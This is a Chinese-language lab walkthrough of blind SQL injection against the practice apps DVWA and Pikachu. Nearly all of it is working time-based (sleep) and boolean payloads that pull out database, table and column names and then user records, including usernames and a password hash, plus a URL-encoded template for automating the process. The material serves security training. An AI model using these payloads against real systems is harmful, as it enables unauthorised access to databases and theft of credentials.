SQL盲注流程
判断是否存在注入点：字符型 exp(1' and 1=1#、1' and 1=2#)；数字型不用闭合单双引号
猜测数据库名字符串长度 exp(1' and length(database())=1#)
猜测数据库名称
猜测数据表个数
猜测数据表名长度
获取数据表名称
猜测数据表字段个数
猜测数据表字段名长度
获取数据表字段值
获取数据
时间盲注(DVWA)
1:获取数据库名字符串长度
1' and if(length(database())=4,sleep(5),1)#
1.1:获取数据库名
1' and if(ascii(substr(database(),1,1))=100,sleep(5),1)# 获取数据库名中第1个字符 d
1' and if(ascii(substr(database(),2,1))=118,sleep(5),1)# 获取数据库名中第2个字符 v
1' and if(ascii(substr(database(),3,1))=119,sleep(5),1)# 获取数据库名中第3个字符 w
1' and if(ascii(substr(database(),4,1))=97,sleep(5),1)# 获取数据库名中第4个字符 a
1' and if(((select database())='dvwa'),sleep(5),1)# 确认数据库名为dvwa
2:获取数据表名个数
1' and if((select count(table_name) from information_schema.TABLES WHERE TABLE_SCHEMA='dvwa') = 2,sleep(5),1)# 2个数据表
3:获取第一个数据表(guestbook)名字符串长度
1' and if(length((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1))=9,sleep(5),1)#
3.1逐字符获取第一个数据表名称(guestbook)
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1))=103,sleep(5),1)# g
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),2,1))=117,sleep(5),1)# u
获取第二张数据表(users)名字符串长度
1' and if(length((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1))=5,sleep(5),1)#
3.2逐字符获取第二个数据表名称(users)
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1))=117,sleep(5),1)# u
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),2,1))=115,sleep(5),1)# s
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),3,1))=101,sleep(5),1)# e
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),4,1))=114,sleep(5),1)# r
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),5,1))=115,sleep(5),1)# s
3.3获取users表中字段个数为8
1' and if((select count(*) from information_schema.columns where table_schema='dvwa' and table_name = 'users') =8,sleep(5),1)#
获取users表中第一个字段名称(user_id)
1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1))=117,sleep(5),1)# u
1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),2,1))=115,sleep(5),1)# s
获取users表中第四个字段名称(user)
1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,1))=117,sleep(5),1)# u
布尔盲注(pikachu)
1:获取数据库名长度
admin' and length(database())=7 #
1.1:获取数据库的名称
admin' and ascii(substr(database(),1,1))=112# p
admin' and ascii(substr(database(),2,1))=105# i
admin' and ascii(substr(database(),3,1))=107# k
admin' and ascii(substr(database(),4,1))=97 # a
admin' and ascii(substr(database(),5,1))=99 # c
admin' and ascii(substr(database(),6,1))=104 # h
admin' and ascii(substr(database(),7,1))=117 # u
2获取pikachu数据库数据表个数
admin' and (select count(table_name) from information_schema.tables where table_schema='pikachu')=5#
2.1获取pikachu数据库第一个数据表名长度(httpinfo)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 0,1)=8)#
2.2获取pikachu数据库第二个数据表名长度(member)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 1,1)=6)#
2.3获取pikachu数据库第三个数据表名长度(message)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 2,1)=7)#
2.4获取pikachu数据库第四个数据表名长度(users)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 3,1)=5)#
2.5获取pikachu数据库第五个数据表名长度(xssblind)
admin' and ((select length(table_name) from information_schema.tables where table_schema='pikachu' limit 4,1)=8)#
2.6获取pikachu数据库第一张数据表名称(httpinfo)
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))=104#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),2,1))=116#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),3,1))=116#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),4,1))=112#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),5,1))=105#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),6,1))=110#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),7,1))=102#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),8,1))=111#
2.7获取pikachu数据库第四张数据表名称(users)
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),1,1))=117#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),2,1))=115#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),3,1))=101#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),4,1))=114#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 3,1),5,1))=115#
3:获取httpinfo表中字段个数
admin' and ((select count(column_name) from information_schema.columns where table_schema='pikachu' and table_name='httpinfo')=6)#
3.1:获取users表中字段个数
admin' and ((select count(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users')=4)#
3.2:获取users表第一个字段名称长度(id)
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1)=2)#
获取users表第二个字段名称长度(username)
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1)=8)#
获取users表第三个字段名称长度(password)
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 2,1)=8)#
获取users表第四个字段名称长度(level)
admin' and ((select length(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' limit 3,1)=5)#
3.3获取users表第一个字段名称(id)
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),1,1))=105#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),2,1))=100#
3.4获取users表第二个字段名称(username)
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),1,1))=117#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),2,1))=115#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),3,1))=101#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),4,1))=114#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),5,1))=110#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),6,1))=97#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),7,1))=109#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 1,1),8,1))=101#
3.4获取users表第三个字段名称(password)
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 2,1),1,1))=112#
admin' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 2,1),2,1))=97#
3.5获取users表第一个字段(id)的内容(1,2,3)
admin' and ascii(substr((select id from users limit 0,1),1,1))=49#
admin' and ascii(substr((select id from users limit 1,1),1,1))=50#
admin' and ascii(substr((select id from users limit 2,1),1,1))=51#
3.6获取users表第二个字段(username)的内容(admin)
admin' and ascii(substr((select username from users limit 0,1),1,1))=97#
admin' and ascii(substr((select username from users limit 0,1),2,1))=100#
admin' and ascii(substr((select username from users limit 0,1),3,1))=109#
admin' and ascii(substr((select username from users limit 0,1),4,1))=105#
admin' and ascii(substr((select username from users limit 0,1),5,1))=110#
3.7获取users表第三个字段(password)的内容(e10adc3949ba59abbe56e057f20f883e)
admin' and ascii(substr((select password from users limit 0,1),1,1))=101#
%27+and+ascii%28substr%28%28select+password+from+users+limit+0%2C1%29%2C{}%2C1%29%29%3D101%23
admin' and ascii(substr((select password from users limit 0,1),2,1))=49#